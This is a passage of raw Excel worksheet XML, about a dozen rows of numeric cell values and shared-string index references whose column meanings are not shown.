        <v>14887</v>
      </c>
      <c r="BC364" t="s">
        <v>10882</v>
      </c>
      <c r="BD364">
        <v>0</v>
      </c>
    </row>
    <row r="365" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A365">
        <v>1582</v>
      </c>
      <c r="B365" t="s">
        <v>3036</v>
      </c>
      <c r="C365" t="s">
        <v>157</v>
      </c>
      <c r="D365" t="s">
        <v>3037</v>
      </c>
      <c r="E365" t="s">
        <v>49</v>
      </c>
      <c r="F365" t="s">
        <v>364</v>
      </c>
      <c r="G365" s="1">
        <v>43964</v>
      </c>
      <c r="H365">
        <v>3524</v>
      </c>
      <c r="I365">
        <v>3524</v>
      </c>
      <c r="J365">
        <v>0</v>
      </c>
      <c r="K365">
        <v>0</v>
      </c>
      <c r="L365">
        <v>0</v>
      </c>
      <c r="M365">
        <v>0</v>
      </c>
      <c r="N365">
        <v>0</v>
      </c>
      <c r="O365">
        <v>0</v>
      </c>
      <c r="P365">
        <v>0</v>
      </c>
      <c r="Q365">
        <v>0</v>
      </c>
      <c r="R365">
        <v>0</v>
      </c>
      <c r="S365">
        <v>0</v>
      </c>
      <c r="T365">
        <v>1</v>
      </c>
      <c r="U365">
        <v>0</v>
      </c>
      <c r="V365">
        <v>0</v>
      </c>
      <c r="W365">
        <v>0</v>
      </c>
      <c r="X365">
        <v>0</v>
      </c>
      <c r="Y365">
        <v>0</v>
      </c>
      <c r="Z365">
        <v>0</v>
      </c>
      <c r="AA365">
        <v>0</v>
      </c>
      <c r="AB365">
        <v>0</v>
      </c>
      <c r="AC365">
        <v>0</v>
      </c>
      <c r="AD365">
        <v>0</v>
      </c>
      <c r="AE365">
        <v>4500</v>
      </c>
      <c r="AF365" t="s">
        <v>3038</v>
      </c>
      <c r="AG365">
        <v>61273</v>
      </c>
      <c r="AH365">
        <v>16</v>
      </c>
      <c r="AJ365">
        <v>242</v>
      </c>
      <c r="AK365" t="s">
        <v>3039</v>
      </c>
      <c r="AL365" t="s">
        <v>3040</v>
      </c>
      <c r="AM365" t="s">
        <v>3041</v>
      </c>
      <c r="AN365" t="s">
        <v>55</v>
      </c>
      <c r="AO365">
        <v>2018</v>
      </c>
      <c r="AP365">
        <v>81259155959</v>
      </c>
      <c r="AQ365" t="s">
        <v>3042</v>
      </c>
      <c r="AR365" t="s">
        <v>3038</v>
      </c>
      <c r="AS365" t="s">
        <v>371</v>
      </c>
      <c r="AT365" t="s">
        <v>58</v>
      </c>
      <c r="AU365">
        <v>30</v>
      </c>
      <c r="AV365">
        <v>2</v>
      </c>
      <c r="AW365">
        <v>5</v>
      </c>
      <c r="AX365">
        <v>0</v>
      </c>
      <c r="AY365">
        <v>1</v>
      </c>
      <c r="AZ365">
        <v>1</v>
      </c>
      <c r="BA365" t="s">
        <v>16941</v>
      </c>
      <c r="BB365" t="s">
        <v>15379</v>
      </c>
      <c r="BC365">
        <v>0</v>
      </c>
      <c r="BD365" t="s">
        <v>10962</v>
      </c>
    </row>
    <row r="366" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A366">
        <v>881</v>
      </c>
      <c r="B366" t="s">
        <v>3043</v>
      </c>
      <c r="C366" t="s">
        <v>47</v>
      </c>
      <c r="D366" t="s">
        <v>3044</v>
      </c>
      <c r="E366" t="s">
        <v>142</v>
      </c>
      <c r="F366" t="s">
        <v>3045</v>
      </c>
      <c r="G366" s="1">
        <v>43994</v>
      </c>
      <c r="H366">
        <v>3531</v>
      </c>
      <c r="I366">
        <v>3531</v>
      </c>
      <c r="J366">
        <v>1</v>
      </c>
      <c r="K366">
        <v>0</v>
      </c>
      <c r="L366">
        <v>0</v>
      </c>
      <c r="M366">
        <v>10</v>
      </c>
      <c r="N366">
        <v>0</v>
      </c>
      <c r="O366">
        <v>0</v>
      </c>
      <c r="P366">
        <v>0</v>
      </c>
      <c r="Q366">
        <v>0</v>
      </c>
      <c r="R366">
        <v>0</v>
      </c>
      <c r="S366">
        <v>0</v>
      </c>
      <c r="T366">
        <v>0</v>
      </c>
      <c r="U366">
        <v>1050</v>
      </c>
      <c r="V366">
        <v>0</v>
      </c>
      <c r="W366">
        <v>0</v>
      </c>
      <c r="X366">
        <v>1200</v>
      </c>
      <c r="Y366">
        <v>0</v>
      </c>
      <c r="Z366">
        <v>0</v>
      </c>
      <c r="AA366">
        <v>0</v>
      </c>
      <c r="AB366">
        <v>0</v>
      </c>
      <c r="AC366">
        <v>0</v>
      </c>
      <c r="AD366">
        <v>0</v>
      </c>
      <c r="AE366">
        <v>0</v>
      </c>
      <c r="AF366" t="s">
        <v>3046</v>
      </c>
      <c r="AG366">
        <v>20411</v>
      </c>
      <c r="AH366">
        <v>2</v>
      </c>
      <c r="AJ366">
        <v>53</v>
      </c>
      <c r="AK366" t="s">
        <v>2220</v>
      </c>
      <c r="AL366" t="s">
        <v>2221</v>
      </c>
      <c r="AM366" t="s">
        <v>3047</v>
      </c>
      <c r="AN366" t="s">
        <v>55</v>
      </c>
      <c r="AO366">
        <v>2014</v>
      </c>
      <c r="AP366" t="s">
        <v>3048</v>
      </c>
      <c r="AQ366" t="s">
        <v>3049</v>
      </c>
      <c r="AR366" t="s">
        <v>3050</v>
      </c>
      <c r="AS366" t="s">
        <v>71</v>
      </c>
      <c r="AT366" t="s">
        <v>58</v>
      </c>
      <c r="AU366">
        <v>26</v>
      </c>
      <c r="AV366">
        <v>1</v>
      </c>
      <c r="AW366">
        <v>63</v>
      </c>
      <c r="AX366">
        <v>273</v>
      </c>
      <c r="AY366">
        <v>11</v>
      </c>
      <c r="AZ366">
        <v>7</v>
      </c>
      <c r="BA366" t="s">
        <v>16769</v>
      </c>
      <c r="BB366" t="s">
        <v>14912</v>
      </c>
      <c r="BC366">
        <v>0</v>
      </c>
      <c r="BD366" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="367" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A367">
        <v>862</v>
      </c>
      <c r="B367" t="s">
        <v>3051</v>
      </c>
      <c r="C367" t="s">
        <v>47</v>
      </c>
      <c r="D367" t="s">
        <v>3052</v>
      </c>
      <c r="E367" t="s">
        <v>142</v>
      </c>
      <c r="F367" t="s">
        <v>3053</v>
      </c>
      <c r="G367" s="1">
        <v>43990</v>
      </c>
      <c r="H367">
        <v>3540</v>
      </c>
      <c r="I367">
        <v>3540</v>
      </c>
      <c r="J367">
        <v>3</v>
      </c>
      <c r="K367">
        <v>0</v>
      </c>
      <c r="L367">
        <v>0</v>
      </c>
      <c r="M367">
        <v>14</v>
      </c>
      <c r="N367">
        <v>4000</v>
      </c>
      <c r="O367">
        <v>0</v>
      </c>
      <c r="P367">
        <v>0</v>
      </c>
      <c r="Q367">
        <v>0</v>
      </c>
      <c r="R367">
        <v>0</v>
      </c>
      <c r="S367">
        <v>0</v>
      </c>
      <c r="T367">
        <v>0</v>
      </c>
      <c r="U367">
        <v>1500000</v>
      </c>
      <c r="V367">
        <v>0</v>
      </c>
      <c r="W367">
        <v>0</v>
      </c>
      <c r="X367">
        <v>14000</v>
      </c>
      <c r="Y367">
        <v>0</v>
      </c>
      <c r="Z367">
        <v>0</v>
      </c>
      <c r="AA367">
        <v>0</v>
      </c>
      <c r="AB367">
        <v>0</v>
      </c>
      <c r="AC367">
        <v>0</v>
      </c>
      <c r="AD367">
        <v>0</v>
      </c>
      <c r="AE367">
        <v>0</v>
      </c>
      <c r="AF367" t="s">
        <v>3054</v>
      </c>
      <c r="AG367">
        <v>20255</v>
      </c>
      <c r="AH367">
        <v>2</v>
      </c>
      <c r="AJ367">
        <v>53</v>
      </c>
      <c r="AK367" t="s">
        <v>3055</v>
      </c>
      <c r="AL367" t="s">
        <v>3056</v>
      </c>
      <c r="AM367" t="s">
        <v>3057</v>
      </c>
      <c r="AN367" t="s">
        <v>55</v>
      </c>
      <c r="AO367">
        <v>2013</v>
      </c>
      <c r="AP367" t="s">
        <v>3058</v>
      </c>
      <c r="AQ367" t="s">
        <v>3059</v>
      </c>
      <c r="AR367" t="s">
        <v>3050</v>
      </c>
      <c r="AS367" t="s">
        <v>71</v>
      </c>
      <c r="AT367" t="s">
        <v>58</v>
      </c>
      <c r="AU367">
        <v>30</v>
      </c>
      <c r="AV367">
        <v>2</v>
      </c>
      <c r="AW367">
        <v>100</v>
      </c>
      <c r="AX367">
        <v>410</v>
      </c>
      <c r="AY367">
        <v>49</v>
      </c>
      <c r="AZ367">
        <v>35</v>
      </c>
      <c r="BA367" t="s">
        <v>16766</v>
      </c>
      <c r="BB367" t="s">
        <v>14900</v>
      </c>
      <c r="BC367">
        <v>0</v>
      </c>
      <c r="BD367" t="s">
        <v>10943</v>
      </c>
    </row>
    <row r="368" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A368">
        <v>841</v>
      </c>
      <c r="B368" t="s">
        <v>3060</v>
      </c>
      <c r="C368" t="s">
        <v>47</v>
      </c>
      <c r="D368" t="s">
        <v>3061</v>
      </c>
      <c r="E368" t="s">
        <v>1346</v>
      </c>
      <c r="F368" t="s">
        <v>3062</v>
      </c>
      <c r="G368" s="1">
        <v>44358</v>
      </c>
      <c r="H368">
        <v>3651</v>
      </c>
      <c r="I368">
        <v>3651</v>
      </c>
      <c r="J368">
        <v>1</v>
      </c>
      <c r="K368">
        <v>1</v>
      </c>
      <c r="L368">
        <v>1</v>
      </c>
      <c r="M368">
        <v>2</v>
      </c>
      <c r="N368">
        <v>0</v>
      </c>
      <c r="O368">
        <v>0</v>
      </c>
      <c r="P368">
        <v>0</v>
      </c>
      <c r="Q368">
        <v>0</v>
      </c>
      <c r="R368">
        <v>0</v>
      </c>
      <c r="S368">
        <v>1</v>
      </c>
      <c r="T368">
        <v>1</v>
      </c>
      <c r="U368">
        <v>128000</v>
      </c>
      <c r="V368">
        <v>1</v>
      </c>
      <c r="W368">
        <v>2000</v>
      </c>
      <c r="X368">
        <v>412</v>
      </c>
      <c r="Y368">
        <v>0</v>
      </c>
      <c r="Z368">
        <v>0</v>
      </c>
      <c r="AA368">
        <v>0</v>
      </c>
      <c r="AB368">
        <v>0</v>
      </c>
      <c r="AC368">
        <v>0</v>
      </c>
      <c r="AD368">
        <v>1</v>
      </c>
      <c r="AE368">
        <v>30000</v>
      </c>
      <c r="AF368" t="s">
        <v>3063</v>
      </c>
      <c r="AG368">
        <v>20371</v>
      </c>
      <c r="AH368">
        <v>2</v>
      </c>
      <c r="AJ368">
        <v>35</v>
      </c>
      <c r="AK368" t="s">
        <v>471</v>
      </c>
      <c r="AL368" t="s">
        <v>472</v>
      </c>
      <c r="AM368" t="s">
        <v>3064</v>
      </c>
      <c r="AN368" t="s">
        <v>55</v>
      </c>
      <c r="AO368">
        <v>2012</v>
      </c>
      <c r="AP368" t="s">
        <v>3065</v>
      </c>
      <c r="AQ368" t="s">
        <v>3066</v>
      </c>
      <c r="AR368" t="s">
        <v>244</v>
      </c>
      <c r="AS368" t="s">
        <v>71</v>
      </c>
      <c r="AT368" t="s">
        <v>58</v>
      </c>
      <c r="AU368">
        <v>25</v>
      </c>
      <c r="AV368">
        <v>0</v>
      </c>
      <c r="AW368">
        <v>174</v>
      </c>
      <c r="AX368">
        <v>441</v>
      </c>
      <c r="AY368">
        <v>20</v>
      </c>
      <c r="AZ368">
        <v>56</v>
      </c>
      <c r="BA368" t="s">
        <v>16764</v>
      </c>
      <c r="BB368" t="s">
        <v>14888</v>
      </c>
      <c r="BC368">
        <v>0</v>
      </c>
      <c r="BD368" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="369" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A369">
        <v>1131</v>
      </c>
      <c r="B369" t="s">
        <v>3067</v>
      </c>
      <c r="C369" t="s">
        <v>47</v>
      </c>
      <c r="D369" t="s">
        <v>3068</v>
      </c>
      <c r="E369" t="s">
        <v>142</v>
      </c>
      <c r="F369" t="s">
        <v>1746</v>
      </c>
      <c r="G369" s="1">
        <v>44007</v>
      </c>
      <c r="H369">
        <v>3703</v>
      </c>
      <c r="I369">
        <v>3703</v>
      </c>
      <c r="J369">
        <v>1</v>
      </c>
      <c r="K369">
        <v>0</v>
      </c>
      <c r="L369">
        <v>0</v>
      </c>
      <c r="M369">
        <v>4</v>
      </c>
      <c r="N369">
        <v>0</v>
      </c>
      <c r="O369">
        <v>0</v>
      </c>
      <c r="P369">
        <v>0</v>
      </c>
      <c r="Q369">
        <v>0</v>
      </c>
      <c r="R369">
        <v>6</v>
      </c>
      <c r="S369">
        <v>0</v>
      </c>
      <c r="T369">
        <v>2</v>
      </c>
      <c r="U369">
        <v>300000</v>
      </c>
      <c r="V369">
        <v>0</v>
      </c>
      <c r="W369">
        <v>0</v>
      </c>
      <c r="X369">
        <v>1500</v>
      </c>
      <c r="Y369">
        <v>0</v>
      </c>
      <c r="Z369">
        <v>0</v>
      </c>
      <c r="AA369">
        <v>0</v>
      </c>
      <c r="AB369">
        <v>0</v>
      </c>
      <c r="AC369">
        <v>500</v>
      </c>
      <c r="AD369">
        <v>0</v>
      </c>
      <c r="AE369">
        <v>26000</v>
      </c>
      <c r="AF369" t="s">
        <v>3069</v>
      </c>
      <c r="AG369">
        <v>20414</v>
      </c>
      <c r="AH369">
        <v>2</v>
      </c>
      <c r="AJ369">
        <v>53</v>
      </c>
      <c r="AK369" t="s">
        <v>2220</v>
      </c>
      <c r="AL369" t="s">
        <v>3070</v>
      </c>
      <c r="AM369" t="s">
        <v>3071</v>
      </c>
      <c r="AN369" t="s">
        <v>55</v>
      </c>
      <c r="AO369">
        <v>2010</v>
      </c>
      <c r="AP369" t="s">
        <v>3072</v>
      </c>
      <c r="AQ369" t="s">
        <v>3073</v>
      </c>
      <c r="AR369" t="s">
        <v>3069</v>
      </c>
      <c r="AS369" t="s">
        <v>71</v>
      </c>
      <c r="AT369" t="s">
        <v>58</v>
      </c>
      <c r="AU369">
        <v>30</v>
      </c>
      <c r="AV369">
        <v>0</v>
      </c>
      <c r="AW369">
        <v>8</v>
      </c>
      <c r="AX369">
        <v>10</v>
      </c>
      <c r="AY369">
        <v>7</v>
      </c>
      <c r="AZ369">
        <v>7</v>
      </c>
      <c r="BA369" t="s">
        <v>16805</v>
      </c>
      <c r="BB369" t="s">
        <v>15070</v>
      </c>
      <c r="BC369">
        <v>0</v>
      </c>
      <c r="BD369" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="370" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A370">
        <v>1087</v>
      </c>
      <c r="B370" t="s">
        <v>3074</v>
      </c>
      <c r="C370" t="s">
        <v>168</v>
      </c>
      <c r="D370" t="s">
        <v>3075</v>
      </c>
      <c r="E370" t="s">
        <v>142</v>
      </c>
      <c r="F370" t="s">
        <v>3076</v>
      </c>
      <c r="G370" s="1">
        <v>44067</v>
      </c>
      <c r="H370">
        <v>3741</v>
      </c>
      <c r="I370">
        <v>3741</v>
      </c>
      <c r="J370">
        <v>2</v>
      </c>
      <c r="K370">
        <v>2</v>
      </c>
      <c r="L370">
        <v>0</v>
      </c>
      <c r="M370">
        <v>4</v>
      </c>
      <c r="N370">
        <v>0</v>
      </c>
      <c r="O370">
        <v>0</v>
      </c>
      <c r="P370">
        <v>0</v>
      </c>
      <c r="Q370">
        <v>0</v>
      </c>
      <c r="R370">
        <v>0</v>
      </c>
      <c r="S370">
        <v>1</v>
      </c>
      <c r="T370">
        <v>1</v>
      </c>
      <c r="U370">
        <v>500000</v>
      </c>
      <c r="V370">
        <v>2</v>
      </c>
      <c r="W370">
        <v>0</v>
      </c>
      <c r="X370">
        <v>1300</v>
      </c>
      <c r="Y370">
        <v>0</v>
      </c>
      <c r="Z370">
        <v>0</v>
      </c>
      <c r="AA370">
        <v>0</v>
      </c>
      <c r="AB370">
        <v>0</v>
      </c>
      <c r="AC370">
        <v>0</v>
      </c>
      <c r="AD370">
        <v>1</v>
      </c>
      <c r="AE370">
        <v>0</v>
      </c>
      <c r="AF370" t="s">
        <v>3077</v>
      </c>
      <c r="AG370">
        <v>16710</v>
      </c>
      <c r="AH370">
        <v>13</v>
      </c>
      <c r="AJ370">
        <v>161</v>
      </c>
      <c r="AK370" t="s">
        <v>1832</v>
      </c>
      <c r="AL370" t="s">
        <v>1833</v>
      </c>
      <c r="AM370" t="s">
        <v>3078</v>
      </c>
      <c r="AN370" t="s">
        <v>55</v>
      </c>
      <c r="AO370">
        <v>2016</v>
      </c>
      <c r="AP370" t="s">
        <v>3079</v>
      </c>
      <c r="AQ370" t="s">
        <v>3080</v>
      </c>
      <c r="AR370" t="s">
        <v>3077</v>
      </c>
      <c r="AS370" t="s">
        <v>71</v>
      </c>
      <c r="AT370" t="s">
        <v>58</v>
      </c>
      <c r="AU370">
        <v>26</v>
      </c>
      <c r="AV370">
        <v>1</v>
      </c>
      <c r="AW370">
        <v>45</v>
      </c>
      <c r="AX370">
        <v>105</v>
      </c>
      <c r="AY370">
        <v>23</v>
      </c>
      <c r="AZ370">
        <v>34</v>
      </c>
      <c r="BA370">
        <v>0</v>
      </c>
      <c r="BB370">
        <v>0</v>
      </c>
      <c r="BC370" t="s">
        <v>9436</v>
      </c>
      <c r="BD370" t="s">
        <v>11232</v>
      </c>
    </row>
    <row r="371" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A371">
        <v>1353</v>
      </c>
      <c r="B371" t="s">
        <v>3081</v>
      </c>
      <c r="C371" t="s">
        <v>129</v>
      </c>
      <c r="D371" t="s">
        <v>3082</v>
      </c>
      <c r="E371" t="s">
        <v>142</v>
      </c>
      <c r="F371" t="s">
        <v>3083</v>
      </c>
      <c r="G371" s="1">
        <v>44309</v>
      </c>
      <c r="H371">
        <v>3770</v>
      </c>
      <c r="I371">
        <v>3770</v>
      </c>
      <c r="J371">
        <v>2</v>
      </c>
      <c r="K371">
        <v>0</v>
      </c>
      <c r="L371">
        <v>2</v>
      </c>
      <c r="M371">
        <v>1</v>
      </c>
      <c r="N371">
        <v>0</v>
      </c>
      <c r="O371">
        <v>0</v>
      </c>
      <c r="P371">
        <v>0</v>
      </c>
      <c r="Q371">
        <v>2</v>
      </c>
      <c r="R371">
        <v>0</v>
      </c>
      <c r="S371">
        <v>1</v>
      </c>
      <c r="T371">
        <v>1</v>
      </c>
      <c r="U371">
        <v>30000</v>
      </c>
      <c r="V371">
        <v>0</v>
      </c>
      <c r="W371">
        <v>5000</v>
      </c>
      <c r="X371">
        <v>2000</v>
      </c>
      <c r="Y371">
        <v>0</v>
      </c>
      <c r="Z371">
        <v>0</v>
      </c>
      <c r="AA371">
        <v>0</v>
      </c>
      <c r="AB371">
        <v>500</v>
      </c>
      <c r="AC371">
        <v>0</v>
      </c>
      <c r="AD371">
        <v>1</v>
      </c>
      <c r="AE371">
        <v>10000</v>
      </c>
      <c r="AF371" t="s">
        <v>3084</v>
      </c>
      <c r="AG371">
        <v>15125</v>
      </c>
      <c r="AH371">
        <v>11</v>
      </c>
      <c r="AJ371">
        <v>270</v>
      </c>
      <c r="AK371" t="s">
        <v>1048</v>
      </c>
      <c r="AL371" t="s">
        <v>1048</v>
      </c>
      <c r="AM371" t="s">
        <v>3085</v>
      </c>
      <c r="AN371" t="s">
        <v>55</v>
      </c>
      <c r="AO371">
        <v>2015</v>
      </c>
      <c r="AP371" t="s">
        <v>3086</v>
      </c>
      <c r="AQ371" t="s">
        <v>3087</v>
      </c>
      <c r="AR371" t="s">
        <v>3084</v>
      </c>
      <c r="AS371" t="s">
        <v>71</v>
      </c>
      <c r="AT371" t="s">
        <v>58</v>
      </c>
      <c r="AU371">
        <v>26</v>
      </c>
      <c r="AV371">
        <v>1</v>
      </c>
      <c r="AW371">
        <v>8</v>
      </c>
      <c r="AX371">
        <v>20</v>
      </c>
      <c r="AY371">
        <v>6</v>
      </c>
      <c r="AZ371">
        <v>6</v>
      </c>
      <c r="BA371" t="s">
        <v>16853</v>
      </c>
      <c r="BB371" t="s">
        <v>15219</v>
      </c>
      <c r="BC371">
        <v>0</v>
      </c>
      <c r="BD371" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="372" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A372">
        <v>1026</v>
      </c>
      <c r="B372" t="s">
        <v>3088</v>
      </c>
      <c r="C372" t="s">
        <v>157</v>
      </c>
      <c r="D372" t="s">
        <v>3089</v>
      </c>
      <c r="E372" t="s">
        <v>142</v>
      </c>
      <c r="F372" t="s">
        <v>2499</v>
      </c>
      <c r="G372" s="1">
        <v>44008</v>
      </c>
      <c r="H372">
        <v>3795</v>
      </c>
      <c r="I372">
        <v>3795</v>
      </c>
      <c r="J372">
        <v>2</v>
      </c>
      <c r="K372">
        <v>0</v>
      </c>
      <c r="L372">
        <v>5</v>
      </c>
      <c r="M372">
        <v>5</v>
      </c>
      <c r="N372">
        <v>0</v>
      </c>
      <c r="O372">
        <v>0</v>
      </c>
      <c r="P372">
        <v>0</v>
      </c>
      <c r="Q372">
        <v>5</v>
      </c>
      <c r="R372">
        <v>16</v>
      </c>
      <c r="S372">
        <v>0</v>
      </c>
      <c r="T372">
        <v>1</v>
      </c>
      <c r="U372">
        <v>500000</v>
      </c>
      <c r="V372">
        <v>0</v>
      </c>
      <c r="W372">
        <v>23000</v>
      </c>
      <c r="X372">
        <v>4500</v>
      </c>
      <c r="Y372">
        <v>0</v>
      </c>
      <c r="Z372">
        <v>0</v>
      </c>
      <c r="AA372">
        <v>0</v>
      </c>
      <c r="AB372">
        <v>2000</v>
      </c>
      <c r="AC372">
        <v>13000</v>
      </c>
      <c r="AD372">
        <v>0</v>
      </c>
      <c r="AE372">
        <v>200000</v>
      </c>
      <c r="AF372" t="s">
        <v>3090</v>
      </c>
      <c r="AG372">
        <v>62353</v>
      </c>
      <c r="AH372">
        <v>16</v>
      </c>
      <c r="AJ372">
        <v>250</v>
      </c>
      <c r="AK372" t="s">
        <v>1870</v>
      </c>
      <c r="AL372" t="s">
        <v>1871</v>
      </c>
      <c r="AM372" t="s">
        <v>3091</v>
      </c>
      <c r="AN372" t="s">
        <v>82</v>
      </c>
      <c r="AO372">
        <v>2015</v>
      </c>
      <c r="AP372" t="s">
        <v>3092</v>
      </c>
      <c r="AQ372" t="s">
        <v>3093</v>
      </c>
      <c r="AR372" t="s">
        <v>3094</v>
      </c>
      <c r="AS372" t="s">
        <v>71</v>
      </c>
      <c r="AT372" t="s">
        <v>86</v>
      </c>
      <c r="AU372">
        <v>26</v>
      </c>
      <c r="AV372">
        <v>0</v>
      </c>
      <c r="AW372">
        <v>35</v>
      </c>
      <c r="AX372">
        <v>60</v>
      </c>
      <c r="AY372">
        <v>6</v>
      </c>
      <c r="AZ372">
        <v>4</v>
      </c>
      <c r="BA372" t="s">
        <v>16789</v>
      </c>
      <c r="BB372" t="s">
        <v>15008</v>
      </c>
      <c r="BC372">
        <v>0</v>
      </c>
      <c r="BD372" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="373" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A373">
        <v>929</v>
      </c>
      <c r="B373" t="s">
        <v>3095</v>
      </c>
      <c r="C373" t="s">
        <v>157</v>
      </c>
      <c r="D373" t="s">
        <v>3096</v>
      </c>
      <c r="E373" t="s">
        <v>142</v>
      </c>
      <c r="F373" t="s">
        <v>3097</v>
      </c>
      <c r="G373" s="1">
        <v>44166</v>
      </c>
      <c r="H373">
        <v>3918</v>
      </c>
      <c r="I373">
        <v>3918</v>
      </c>
      <c r="J373">
        <v>3</v>
      </c>
      <c r="K373">
        <v>0</v>
      </c>
      <c r="L373">
        <v>1</v>
      </c>
      <c r="M373">
        <v>0</v>
      </c>
      <c r="N373">
        <v>0</v>
      </c>
      <c r="O373">
        <v>0</v>
      </c>
      <c r="P373">
        <v>0</v>
      </c>
      <c r="Q373">
        <v>2</v>
      </c>
      <c r="R373">
        <v>1</v>
      </c>
      <c r="S373">
        <v>0</v>
      </c>
      <c r="T373">
        <v>0</v>
      </c>
      <c r="U373">
        <v>750000</v>
      </c>
      <c r="V373">
        <v>0</v>
      </c>
      <c r="W373">
        <v>5000</v>
      </c>
      <c r="X373">
        <v>0</v>
      </c>
      <c r="Y373">
        <v>0</v>
      </c>
      <c r="Z373">
        <v>0</v>
      </c>
      <c r="AA373">
        <v>0</v>
      </c>
      <c r="AB373">
        <v>200</v>
      </c>
      <c r="AC373">
        <v>300</v>
      </c>
      <c r="AD373">
        <v>0</v>
      </c>
      <c r="AE373">
        <v>0</v>
      </c>
      <c r="AF373" t="s">
        <v>3098</v>
      </c>
      <c r="AG373">
        <v>67218</v>
      </c>
      <c r="AH373">
        <v>16</v>
      </c>
      <c r="AJ373">
        <v>260</v>
      </c>
      <c r="AK373" t="s">
        <v>425</v>
      </c>
      <c r="AL373" t="s">
        <v>2687</v>
      </c>
      <c r="AM373" t="s">
        <v>3099</v>
      </c>
      <c r="AN373" t="s">
        <v>55</v>
      </c>
      <c r="AO373">
        <v>2017</v>
      </c>
      <c r="AP373" t="s">
        <v>3100</v>
      </c>
      <c r="AQ373" t="s">
        <v>3101</v>
      </c>
      <c r="AR373" t="s">
        <v>3102</v>
      </c>
      <c r="AS373" t="s">
        <v>71</v>
      </c>
      <c r="AT373" t="s">
        <v>58</v>
      </c>
      <c r="AU373">
        <v>0</v>
      </c>
      <c r="AV373">
        <v>0</v>
      </c>
      <c r="AW373">
        <v>20</v>
      </c>
      <c r="AX373">
        <v>30</v>
      </c>
      <c r="AY373">
        <v>2</v>
      </c>
      <c r="AZ373">
        <v>3</v>
      </c>
      <c r="BA373" t="s">
        <v>16776</v>
      </c>
      <c r="BB373" t="s">
        <v>14943</v>
      </c>
      <c r="BC373" t="s">
        <v>11066</v>
      </c>
      <c r="BD373" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="374" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A374">
        <v>1647</v>
      </c>
      <c r="B374" t="s">
        <v>3103</v>
      </c>
      <c r="C374" t="s">
        <v>88</v>
      </c>
      <c r="D374" t="s">
        <v>3104</v>
      </c>
      <c r="E374" t="s">
        <v>300</v>
      </c>
      <c r="F374" t="s">
        <v>3105</v>
      </c>
      <c r="G374" s="1">
        <v>44050</v>
      </c>
      <c r="H374">
        <v>4084</v>
      </c>
      <c r="I374">
        <v>4084</v>
      </c>
      <c r="J374">
        <v>6</v>
      </c>
      <c r="K374">
        <v>1</v>
      </c>
      <c r="L374">
        <v>1</v>
      </c>
      <c r="M374">
        <v>0</v>
      </c>
      <c r="N374">
        <v>0</v>
      </c>
      <c r="O374">
        <v>0</v>
      </c>
      <c r="P374">
        <v>0</v>
      </c>
      <c r="Q374">
        <v>0</v>
      </c>
      <c r="R374">
        <v>4</v>
      </c>
      <c r="S374">
        <v>1</v>
      </c>
      <c r="T374">
        <v>0</v>
      </c>
      <c r="U374">
        <v>600000</v>
      </c>
      <c r="V374">
        <v>8000</v>
      </c>
      <c r="W374">
        <v>5000</v>
      </c>
      <c r="X374">
        <v>0</v>
      </c>
      <c r="Y374">
        <v>0</v>
      </c>
      <c r="Z374">
        <v>0</v>
      </c>
      <c r="AA374">
        <v>0</v>
      </c>
      <c r="AB374">
        <v>0</v>
      </c>
      <c r="AC374">
        <v>13000</v>
      </c>
      <c r="AD374">
        <v>1</v>
      </c>
      <c r="AE374">
        <v>0</v>
      </c>
      <c r="AF374" t="s">
        <v>3106</v>
      </c>
      <c r="AG374">
        <v>80222</v>
      </c>
      <c r="AH374">
        <v>17</v>
      </c>
      <c r="AJ374">
        <v>282</v>
      </c>
      <c r="AK374" t="s">
        <v>592</v>
      </c>
      <c r="AL374" t="s">
        <v>593</v>
      </c>
      <c r="AM374" t="s">
        <v>3107</v>
      </c>
      <c r="AN374" t="s">
        <v>55</v>
      </c>
      <c r="AO374">
        <v>2008</v>
      </c>
      <c r="AP374" t="s">
        <v>3108</v>
      </c>
      <c r="AQ374" t="s">
        <v>3109</v>
      </c>
      <c r="AR374" t="s">
        <v>3110</v>
      </c>
      <c r="AU374">
        <v>26</v>
      </c>
      <c r="AV374">
        <v>0</v>
      </c>
      <c r="AW374">
        <v>0</v>
      </c>
      <c r="AX374">
        <v>0</v>
      </c>
      <c r="AY374">
        <v>18</v>
      </c>
      <c r="AZ374">
        <v>30</v>
      </c>
      <c r="BA374" t="s">
        <v>16962</v>
      </c>
      <c r="BB374" t="s">
        <v>14505</v>
      </c>
      <c r="BC374" t="s">
        <v>9698</v>
      </c>
      <c r="BD374" t="s">
        <v>11420</v>
      </c>
    </row>
    <row r="375" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A375">
        <v>1070</v>
      </c>
      <c r="B375" t="s">
        <v>3111</v>
      </c>
      <c r="C375" t="s">
        <v>318</v>
      </c>
      <c r="D375" t="s">
        <v>3112</v>
      </c>
      <c r="E375" t="s">
        <v>142</v>
      </c>
      <c r="F375" t="s">
        <v>1746</v>
      </c>
      <c r="G375" s="1">
        <v>44140</v>
      </c>
      <c r="H375">
        <v>4185</v>
      </c>
      <c r="I375">
        <v>4185</v>
      </c>
      <c r="J375">
        <v>1</v>
      </c>
      <c r="K375">
        <v>1</v>
      </c>
      <c r="L375">
        <v>1</v>
      </c>
      <c r="M375">
        <v>0</v>
      </c>
      <c r="N375">
        <v>0</v>
      </c>
      <c r="O375">
        <v>0</v>
      </c>
      <c r="P375">
        <v>0</v>
      </c>
      <c r="Q375">
        <v>6</v>
      </c>
      <c r="R375">
        <v>6</v>
      </c>
      <c r="S375">
        <v>1</v>
      </c>
      <c r="T375">
        <v>1</v>
      </c>
      <c r="U375">
        <v>3</v>
      </c>
      <c r="V375">
        <v>80</v>
      </c>
      <c r="W375">
        <v>3</v>
      </c>
      <c r="X375">
        <v>0</v>
      </c>
      <c r="Y375">
        <v>0</v>
      </c>
      <c r="Z375">
        <v>0</v>
